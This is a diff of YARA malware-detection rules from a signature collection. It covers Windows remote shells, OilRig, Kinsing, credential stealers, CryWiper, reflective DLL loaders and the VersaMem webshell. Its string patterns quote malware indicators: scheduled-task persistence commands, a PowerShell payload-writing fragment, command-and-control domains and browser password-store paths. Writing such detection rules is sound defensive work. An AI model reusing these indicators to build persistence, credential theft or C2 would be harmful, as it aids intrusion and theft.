+		author = "Florian Roth (Nextron Systems)"
+		id = "b2c8aaf7-7953-55a3-8499-565800fa01f1"
+		date = "2021-09-08"
 		modified = "2023-12-05"
-		reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shamoon.yar#L1-L13"
+		reference = "https://github.com/geemion/Khepri/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_khepri.yar#L2-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ed550832b217f7edceea2edf7c4453925ed1759d97db7728f7face6ff10ee361"
-		score = 75
+		logic_hash = "c688dbda6006ef28305285f6aeec24a23cbfe9174d09cf4e3586bd0cf7290e60"
+		score = 90
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "86c48679db5f4c085fd741ebec5235bc6cf0cdf8ef2d98fd8a689ceb5088f431"
 
 	strings:
-		$testn123 = "test123" wide
-		$testn456 = "test456" wide
-		$testn789 = "test789" wide
-		$testdomain = "testdomain.com" wide
-		$pingcmd = "ping -n 30 127.0.0.1 >nul" wide
+		$x1 = "NT %d.%d Build %d  ProductType:%s" ascii fullword
+		$xe1 = "YzIuQ01EUEFSQU0uY21k" ascii
+		$xe2 = "MyLkNNRFBBUkFNLmNtZ" ascii
+		$xe3 = "jMi5DTURQQVJBTS5jbW" ascii
+		$sx1 = "c2.ProcessItem.user" ascii fullword
+		$sx2 = "c2.CMDPARAM.cmd" ascii fullword
+		$sx3 = "c2.DownLoadFile.file_path" ascii fullword
+		$sa1 = "file size zero"
+		$sa2 = "cmd.exe /c "
+		$sa3 = "error parse param"
+		$sa4 = "innet_ip"
+		$op1 = { c3 b9 b4 98 49 00 87 01 5d c3 b8 b8 98 49 00 c3 8b ff }
+		$op2 = { 8b f1 80 3d 58 97 49 00 00 0f 85 96 00 00 00 33 c0 40 b9 50 97 49 00 87 01 33 db }
+		$op3 = { 90 d5 0c 43 00 34 0d 43 00 ea 0c 43 00 7e 0d 43 00 b6 0d 43 00 cc }
+		$op4 = { 69 c0 ff 00 00 00 8b 4d c0 23 88 40 7c 49 00 89 4d c0 8b 45 cc 0b 45 c0 89 45 cc 8b 45 d0 }
 
 	condition:
-		( any of ( $testn* ) or $pingcmd ) and $testdomain
+		( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x7f454c46 ) and filesize < 2000KB and ( 1 of ( $x* ) or 2 of ( $sx* ) or all of ( $sa* ) or 3 of ( $op* ) ) or ( filesize < 10MB and 1 of ( $xe* ) ) or 5 of them
 }
-rule SIGNATURE_BASE_Windowsshell_S3 : FILE
+rule SIGNATURE_BASE_Oilrig_Strings_Oct17 : FILE
 {
 	meta:
-		description = "Detects simple Windows shell - file s3.exe"
+		description = "Detects strings from OilRig malware and malicious scripts"
 		author = "Florian Roth (Nextron Systems)"
-		id = "064754a7-8639-5dbd-93f3-906662b8e9bc"
-		date = "2016-03-26"
-		modified = "2023-12-05"
-		reference = "https://github.com/odzhan/shells/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winshells.yar#L10-L31"
+		id = "edf7c7ca-0c58-5507-8d99-83078ff8947a"
+		date = "2017-10-18"
+		modified = "2022-12-21"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_oct17.yar#L11-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "344575a58db288c9b5dacc654abc36d38db2e645acff05e894ff51183c61357d"
-		logic_hash = "b9274f909b50247a4f5111a14806faadba7814e26805bef7d61eaaf8be4b46ed"
+		logic_hash = "3987fa1ccb215edeb0d36c947fd6d7a24847ea854d3f355d1aef4b000f55e710"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "cmd                  - execute cmd.exe" fullword ascii
-		$s2 = "\\\\.\\pipe\\%08X" fullword ascii
-		$s3 = "get <remote> <local> - download file" fullword ascii
-		$s4 = "[ simple remote shell for windows v3" fullword ascii
-		$s5 = "REMOTE: CreateFile(\"%s\")" fullword ascii
-		$s6 = "put <local> <remote> - upload file" fullword ascii
-		$s7 = "term                 - terminate remote client" fullword ascii
-		$s8 = "[ downloading \"%s\" to \"%s\"" fullword ascii
-		$s9 = "-l           Listen for incoming connections" fullword ascii
+		$x1 = "%localappdata%\\srvHealth.exe" fullword wide ascii
+		$x2 = "%localappdata%\\srvBS.txt" fullword wide ascii
+		$x3 = "Agent Injector\\PolicyConverter\\Inner\\obj\\Release\\Inner.pdb" ascii
+		$x4 = "Agent Injector\\PolicyConverter\\Joiner\\obj\\Release\\Joiner.pdb" ascii
+		$s3 = ".LoadDll(\"Run\", arg, \"C:\\\\Windows\\\\" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them ) or ( 5 of them )
+		filesize < 800KB and 1 of them
 }
-rule SIGNATURE_BASE_Windosshell_S1 : FILE
+rule SIGNATURE_BASE_Oilrig_Ismagent_Campaign_Samples1 : FILE
 {
 	meta:
-		description = "Detects simple Windows shell - file s1.exe"
+		description = "Detects OilRig malware from Unit 42 report in October 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b4e783a2-4a93-5c72-9b09-4692b383ac00"
-		date = "2016-03-26"
+		id = "237fe7af-a2ab-51ae-bc96-3af46b08622a"
+		date = "2017-10-18"
 		modified = "2023-12-05"
-		reference = "https://github.com/odzhan/shells/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winshells.yar#L33-L53"
+		reference = "https://goo.gl/JQVfFP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_oct17.yar#L42-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4a397497cfaf91e05a9b9d6fa6e335243cca3f175d5d81296b96c13c624818bd"
-		logic_hash = "29fcddc549c615ca5cdda60272926671bc1446c3c7b51c9a2fd867b6b68858b2"
+		logic_hash = "d7e659440e3abc7355f2e21ea8f63cfb7b17b5715e4575bdccf9d646ed47db20"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "119c64a8b35bd626b3ea5f630d533b2e0e7852a4c59694125ff08f9965b5f9cc"
+		hash2 = "0ccb2117c34e3045a4d2c0d193f1963c8c0e8566617ed0a561546c932d1a5c0c"
 
 	strings:
-		$s1 = "[ executing cmd.exe" fullword ascii
-		$s2 = "[ simple remote shell for windows v1" fullword ascii
-		$s3 = "-p <number>  Port number to use (default is 443)" fullword ascii
-		$s4 = "usage: s1 <address> [options]" fullword ascii
-		$s5 = "[ waiting for connections on %s" fullword ascii
-		$s6 = "-l           Listen for incoming connections" fullword ascii
-		$s7 = "[ connection from %s" fullword ascii
-		$s8 = "[ %c%c requires parameter" fullword ascii
+		$s1 = "###$$$TVqQAAMAAAAEAAAA" ascii
+		$s2 = "C:\\Users\\J-Win-7-32-Vm\\Desktop\\error.jpg" fullword wide
+		$s3 = "$DATA = [System.Convert]::FromBase64String([IO.File]::ReadAllText('%Base%'));[io.file]::WriteAllBytes(" ascii
+		$s4 = " /c echo powershell > " fullword wide ascii
+		$s5 = "\\Libraries\\servicereset.exe" wide
+		$s6 = "%DestFolder%" fullword wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them ) or ( 5 of them )
+		uint16( 0 ) == 0xcfd0 and filesize < 3000KB and 2 of them
 }
-rule SIGNATURE_BASE_Windowsshell_S4 : FILE
+rule SIGNATURE_BASE_Oilrig_Ismagent_Campaign_Samples2 : FILE
 {
 	meta:
-		description = "Detects simple Windows shell - file s4.exe"
+		description = "Detects OilRig malware from Unit 42 report in October 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "838771dc-f885-5332-9813-2bc01af8e5fe"
-		date = "2016-03-26"
+		id = "08771b23-1d0e-5da7-b42c-005ed257e2d1"
+		date = "2017-10-18"
 		modified = "2023-12-05"
-		reference = "https://github.com/odzhan/shells/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winshells.yar#L55-L75"
+		reference = "https://goo.gl/JQVfFP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_oct17.yar#L63-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f00a1af494067b275407c449b11dfcf5cb9b59a6fac685ebd3f0eb193337e1d6"
-		logic_hash = "fff280debdd32a736e37a73800f226bf6def5dd107abd1d9237d92904622c9ec"
+		logic_hash = "ad00c7293f61f1b5528c3eea0dc32c10d40aeacc194be84a7f64d19b069f1add"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fcad263d0fe2b418db05f47d4036f0b42aaf201c9b91281dfdcb3201b298e4f4"
+		hash2 = "33c187cfd9e3b68c3089c27ac64a519ccc951ccb3c74d75179c520f54f11f647"
 
 	strings:
-		$s1 = "cmd                  - execute cmd.exe" fullword ascii
-		$s2 = "\\\\.\\pipe\\%08X" fullword ascii
-		$s3 = "get <remote> <local> - download file" fullword ascii
-		$s4 = "[ simple remote shell for windows v4" fullword ascii
-		$s5 = "REMOTE: CreateFile(\"%s\")" fullword ascii
-		$s6 = "[ downloading \"%s\" to \"%s\"" fullword ascii
-		$s7 = "[ uploading \"%s\" to \"%s\"" fullword ascii
-		$s8 = "-l           Listen for incoming connections" fullword ascii
+		$x1 = "PolicyConverter.exe" fullword wide
+		$x2 = "SrvHealth.exe" fullword wide
+		$x3 = "srvBS.txt" fullword wide
+		$s1 = "{a3538ba3-5cf7-43f0-bc0e-9b53a98e1643}, PublicKeyToken=3e56350693f7355e" fullword wide
+		$s2 = "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( 5 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 2 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Windowsshell_Gen : FILE
+
+rule SIGNATURE_BASE_Oilrig_Ismagent_Campaign_Samples3 : FILE
 {
 	meta:
-		description = "Detects simple Windows shell - from files keygen.exe, s1.exe, s2.exe, s3.exe, s4.exe"
+		description = "Detects OilRig malware from Unit 42 report in October 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6b871e8a-8fe3-5cc6-9f2c-ba2359861ea1"
-		date = "2016-03-26"
+		id = "e26510bd-d183-566a-a185-ebed7a81401c"
+		date = "2017-10-18"
 		modified = "2023-12-05"
-		reference = "https://github.com/odzhan/shells/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winshells.yar#L79-L99"
+		reference = "https://goo.gl/JQVfFP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_oct17.yar#L84-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "753dd12f649bcbfcc2c60a2f3be27df5297a671a0ee1856093eed04113616581"
+		logic_hash = "a4984cf33e7b0e0dae264ed11caae6cfab9db2a6047a46ec41c28b5637b4589b"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "a7c3d85eabac01e7a7ec914477ea9f17e3020b3b2f8584a46a98eb6a2a7611c5"
-		hash2 = "4a397497cfaf91e05a9b9d6fa6e335243cca3f175d5d81296b96c13c624818bd"
-		hash3 = "df0693caae2e5914e63e9ee1a14c1e9506f13060faed67db5797c9e61f3907f0"
-		hash4 = "344575a58db288c9b5dacc654abc36d38db2e645acff05e894ff51183c61357d"
-		hash5 = "f00a1af494067b275407c449b11dfcf5cb9b59a6fac685ebd3f0eb193337e1d6"
+		hash1 = "a9f1375da973b229eb649dc3c07484ae7513032b79665efe78c0e55a6e716821"
 
 	strings:
-		$s0 = "[ %c%c requires parameter" fullword ascii
-		$s1 = "[ %s : %i" fullword ascii
-		$s2 = "[ %s : %s" fullword ascii
+		$x1 = "cmd /c schtasks /query /tn TimeUpdate > NUL 2>&1" ascii
+		$x2 = "schtasks /create /sc minute /mo 0002 /tn TimeUpdate /tr" fullword ascii
+		$x3 = "-c  SampleDomain.com -m scheduleminutes" fullword ascii
+		$x4 = ".ntpupdateserver.com" fullword ascii
+		$x5 = ".msoffice365update.com" fullword ascii
+		$s1 = "out.exe" fullword ascii
+		$s2 = "\\Win32Project1\\Release\\Win32Project1.pdb" ascii
+		$s3 = "C:\\windows\\system32\\cmd.exe /c (" ascii
+		$s4 = "Content-Disposition: form-data; name=\"file\"; filename=\"a.a\"" fullword ascii
+		$s5 = "Agent configured successfully" fullword ascii
+		$s6 = "\\runlog*" ascii
+		$s7 = "can not specify username!!" fullword ascii
+		$s8 = "Agent can not be configured" fullword ascii
+		$s9 = "%08lX%04hX%04hX%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX" fullword ascii
+		$s10 = "!!! can not create output file !!!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "538805ecd776b9a42e71aebf94fde1b1" or pe.imphash ( ) == "861ac226fbe8c99a2c43ff451e95da97" or ( 1 of ( $x* ) or 3 of them ) )
 }
-rule SIGNATURE_BASE_Windowsshell_Gen2 : FILE
+rule SIGNATURE_BASE_Crime_H2Miner_Kinsing : FILE
 {
 	meta:
-		description = "Detects simple Windows shell - from files s3.exe, s4.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8ed8443d-491b-5cb0-b12b-0d25267ba462"
-		date = "2016-03-26"
+		description = "Rule to find Kinsing malware"
+		author = "Tony Lambert, Red Canary"
+		id = "1cabca0d-7134-517e-b82e-f2b20b4d1c34"
+		date = "2020-06-09"
 		modified = "2023-12-05"
-		reference = "https://github.com/odzhan/shells/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winshells.yar#L101-L122"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_h2miner_kinsing.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c5ce27554b2ee25b974b567ef5a9ae877906250073da477f0ab5d71d162ac81a"
+		logic_hash = "8795f01f4ce85ca37a4e4667a4ee9756dae6af42884cf79830877a5c35a3bd3b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "344575a58db288c9b5dacc654abc36d38db2e645acff05e894ff51183c61357d"
-		hash2 = "f00a1af494067b275407c449b11dfcf5cb9b59a6fac685ebd3f0eb193337e1d6"
 
 	strings:
-		$s1 = "cmd                  - execute cmd.exe" fullword ascii
-		$s2 = "get <remote> <local> - download file" fullword ascii
-		$s3 = "REMOTE: CreateFile(\"%s\")" fullword ascii
-		$s4 = "put <local> <remote> - upload file" fullword ascii
-		$s5 = "term                 - terminate remote client" fullword ascii
-		$s6 = "[ uploading \"%s\" to \"%s\"" fullword ascii
-		$s7 = "[ error : received %i bytes" fullword ascii
+		$s1 = "-iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT"
+		$s2 = "libpcap"
+		$s3 = "main.backconnect"
+		$s4 = "main.masscan"
+		$s5 = "main.checkHealth"
+		$s6 = "main.redisBrute"
+		$s7 = "ActiveC2CUrl"
+		$s8 = "main.RC4"
+		$s9 = "main.runTask"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( 5 of them )
+		( uint32( 0 ) == 0x464C457F ) and filesize > 1MB and all of them
 }
-rule SIGNATURE_BASE_MAL_Envrial_Jan18_1 : FILE
+rule SIGNATURE_BASE_Credentialstealer_Generic_Backdoor : FILE
 {
 	meta:
-		description = "Detects Encrial credential stealer malware"
+		description = "Detects credential stealer byed on many strings that indicate password store access"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8be5f0d8-013f-5070-9e19-9ac522c88693"
-		date = "2018-01-21"
+		id = "b3124f6c-4e18-562c-84d9-d51e086da446"
+		date = "2017-06-07"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/malwrhunterteam/status/953313514629853184"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_envrial.yar#L11-L40"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_credstealer_generic.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f047bedaac4dd934657b282a2587c55f3087a7cceb1a80becf14e7db3c365e8b"
+		logic_hash = "aa06291a91ac84f80cd2cbe5a01c2cbcc14cf6914da9d1234af9b3d833990551"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85"
-		hash2 = "9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d"
+		hash1 = "edb2d039a57181acf95bd91b2a20bd9f1d66f3ece18506d4ad870ab65e568f2c"
 
 	strings:
-		$x1 = "/Evrial/master/domen" wide
-		$a1 = "\\Opera Software\\Opera Stable\\Login Data" wide
-		$a2 = "\\Comodo\\Dragon\\User Data\\Default\\Login Data" wide
-		$a3 = "\\Google\\Chrome\\User Data\\Default\\Login Data" wide
-		$a4 = "\\Orbitum\\User Data\\Default\\Login Data" wide
-		$a5 = "\\Kometa\\User Data\\Default\\Login Data" wide
-		$s1 = "dlhosta.exe" fullword wide
-		$s2 = "\\passwords.log" wide
-		$s3 = "{{ <>h__TransparentIdentifier1 = {0}, Password = {1} }}" fullword wide
-		$s4 = "files/upload.php?user={0}&hwid={1}" fullword wide
+		$s1 = "GetOperaLoginData" fullword ascii
+		$s2 = "GetInternetExplorerCredentialsPasswords" fullword ascii
+		$s3 = "%s\\Opera Software\\Opera Stable\\Login Data" fullword ascii
+		$s4 = "select *  from moz_logins" fullword ascii
+		$s5 = "%s\\Google\\Chrome\\User Data\\Default\\Login Data" fullword ascii
+		$s6 = "Host.dll.Windows" fullword ascii
+		$s7 = "GetInternetExplorerVaultPasswords" fullword ascii
+		$s8 = "GetWindowsLiveMessengerPasswords" fullword ascii
+		$s9 = "%s\\Chromium\\User Data\\Default\\Login Data" fullword ascii
+		$s10 = "%s\\Opera\\Opera\\profile\\wand.dat" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of them or 2 of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and 4 of them )
 }
-rule SIGNATURE_BASE_Hatman_Compiled_Python : HATMAN
+rule SIGNATURE_BASE_APT_Crywiper_Dec22
 {
 	meta:
-		description = "Detects Hatman malware"
-		author = "DHS/NCCIC/ICS-CERT"
-		id = "fd156669-72b4-59a5-8f36-aac21d7b3105"
-		date = "2017-12-19"
+		description = "Detects CryWiper malware samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d56ccf4e-30ba-5308-ad68-ffc2ae5a1718"
+		date = "2022-12-05"
 		modified = "2023-12-05"
-		reference = "https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hatman.yar#L86-L95"
+		reference = "https://securelist-ru.translate.goog/novyj-troyanec-crywiper/106114/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ru_crywiper.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a18018e4c6ea5b7ab6e1dbdc050e565f66520676565db6d352f58a786097960f"
+		logic_hash = "7c22e02ed996cd820ed87a0c5d50e3264629cdd887aad4ea466cadeccaee2b2f"
 		score = 75
 		quality = 85
-		tags = "HATMAN"
+		tags = ""
 
-	condition:
-		SIGNATURE_BASE_Hatman_Nullsub_PRIVATE and SIGNATURE_BASE_Hatman_Setstatus_PRIVATE and SIGNATURE_BASE_Hatman_Dividers_PRIVATE
-}
-rule SIGNATURE_BASE_Hatman_Injector : HATMAN
-{
-	meta:
-		description = "Detects Hatman malware"
-		author = "DHS/NCCIC/ICS-CERT"
-		id = "b939b83d-cc4a-5998-89a7-8abf8d0b8592"
-		date = "2017-12-19"
-		modified = "2023-01-09"
-		reference = "https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hatman.yar#L96-L106"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "19edf44bec6e1cbccefa145c5ae1bf0820729a80ac3ef1c8e7100b465b487e3c"
-		score = 75
-		quality = 85
-		tags = "HATMAN"
+	strings:
+		$x1 = "Software\\Sysinternals\\BrowserUpdate"
+		$sx1 = "taskkill.exe /f /im MSExchange*"
+		$s1 = "SYSTEM\\CurrentControlSet\\Control\\Terminal Server" ascii
+		$s2 = "fDenyTSConnections" ascii
 
 	condition:
-		(SIGNATURE_BASE_Hatman_Memcpy_PRIVATE and SIGNATURE_BASE_Hatman_Origaddr_PRIVATE and SIGNATURE_BASE_Hatman_Loadoff_PRIVATE )
+		1 of ( $x* ) or all of ( $s* )
 }
-rule SIGNATURE_BASE_Hatman_Payload : HATMAN
+
+rule SIGNATURE_BASE_Reflectiveloader : FILE
 {
 	meta:
-		description = "Detects Hatman malware"
-		author = "DHS/NCCIC/ICS-CERT"
-		id = "9ef57fca-a536-5937-8510-b410f735a73e"
-		date = "2017-12-19"
-		modified = "2023-12-05"
-		reference = "https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hatman.yar#L107-L116"
+		description = "Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d8a601d7-b99a-59dc-bfc7-bf0e35b5d8bd"
+		date = "2017-07-17"
+		modified = "2021-03-15"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_loaders.yar#L14-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9a6e5d2c2f2be35e6dc8b418e33419977460006923ecd9f029cacf51d8c0477a"
-		score = 75
+		logic_hash = "4d839674f8d8181b11af964a7c84a9eb8f07623500dd2695fca9ca3b15c247e2"
+		score = 70
 		quality = 85
-		tags = "HATMAN"
+		tags = "FILE"
+		nodeepdive = 1
+
+	strings:
+		$x1 = "ReflectiveLoader" fullword ascii
+		$x2 = "ReflectivLoader.dll" fullword ascii
+		$x3 = "?ReflectiveLoader@@" ascii
+		$x4 = "reflective_dll.x64.dll" fullword ascii
+		$x5 = "reflective_dll.dll" fullword ascii
+		$fp1 = "Sentinel Labs, Inc." wide
+		$fp2 = "Panda Security, S.L." wide ascii
 
 	condition:
-		(SIGNATURE_BASE_Hatman_Memcpy_PRIVATE and SIGNATURE_BASE_Hatman_Origcode_PRIVATE and SIGNATURE_BASE_Hatman_Mftmsr_PRIVATE ) and not ( SIGNATURE_BASE_Hatman_Origaddr_PRIVATE and SIGNATURE_BASE_Hatman_Loadoff_PRIVATE )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or pe.exports ( "ReflectiveLoader" ) or pe.exports ( "_ReflectiveLoader@4" ) or pe.exports ( "?ReflectiveLoader@@YGKPAX@Z" ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_WEBSHELL_JAVA_Versamem_JAR_Aug24_1 : FILE
+
+rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_1 : FILE
 {
 	meta:
-		description = "Detects VersaMem Java webshell samples (as used by Volt Typhoon)"
-		author = "blacklotuslabs (modified by Florian Roth and X__Junior)"
-		id = "9b666e61-cfa8-58b3-a362-772cd907c57c"
-		date = "2024-08-27"
-		modified = "2024-08-29"
-		reference = "https://x.com/ryanaraine/status/1828440883315999117"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volttyphoon_versamem.yar#L2-L24"
+		description = "Detects Reflective DLL Loader"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9a2674f8-5fdb-5a4d-a2b9-41e874939616"
+		date = "2017-08-20"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_loaders.yar#L53-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d21558eb6c8e700b8a4cb86fdaa5487179828152af68828e878397859d6d3952"
+		logic_hash = "9ad012dda538d37242c92c6ed16a0fb1cd9252a2884387f8e7d9c80b041c8fea"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f2f85855914345eec629e6fc5333cf325a620531d1441313292924a88564e320"
 
 	strings:
-		$sa1 = "com.versa.vnms.ui.TestMain"
-		$sa2 = "captureLoginPasswordCode"
-		$sa3 = "com/versa/vnms/ui/services/impl/VersaAuthenticationServiceImpl"
-		$sa4 = "/tmp/.temp.data"
-		$sa5 = "getInsertCode"
-		$sa6 = "VersaMem"
-		$sa7 = "Versa-Auth"
-		$sb1 = "/tmp/.java_pid"
-		$sb2 = {2f 75 73 72 2f 62 69 6e 2f 70 67 72 65 70 01 00 02 2d 66 01 00 25 6f 72 67 2e 61 70 61 63 68 65 2e 63 61 74 61 6c 69 6e 61 2e 73 74 61 72 74 75 70 2e 42 6f 6f 74 73 74 72 61 70 07}
+		$x1 = "\\Release\\reflective_dll.pdb" ascii
+		$x2 = "reflective_dll.x64.dll" fullword ascii
+		$s3 = "DLL Injection" fullword ascii
+		$s4 = "?ReflectiveLoader@@YA_KPEAX@Z" fullword ascii
 
 	condition:
-		filesize < 5MB and ( 3 of them or all of ( $sb* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "4bf489ae7d1e6575f5bb81ae4d10862f" or pe.exports ( "?ReflectiveLoader@@YA_KPEAX@Z" ) or ( 1 of ( $x* ) or 2 of them ) ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_JAVA_Versamem_JAR_Aug24_2 : FILE
+rule SIGNATURE_BASE_DLL_Injector_Lynx : FILE
 {
 	meta:
-		description = "Detects VersaMem Java webshell samples (as used by Volt Typhoon)"
-		author = "Florian Roth"
-		id = "5ca598ed-5d0a-563d-a5e8-f8229af2c949"
-		date = "2024-08-29"
-		modified = "2024-12-12"
-		reference = "https://x.com/craiu/status/1828687700884336990"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volttyphoon_versamem.yar#L27-L43"
+		description = "Detects Lynx DLL Injector"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7a4c9949-c701-5ae2-a8b1-3ef0b08c1c04"
+		date = "2017-08-20"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_loaders.yar#L78-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
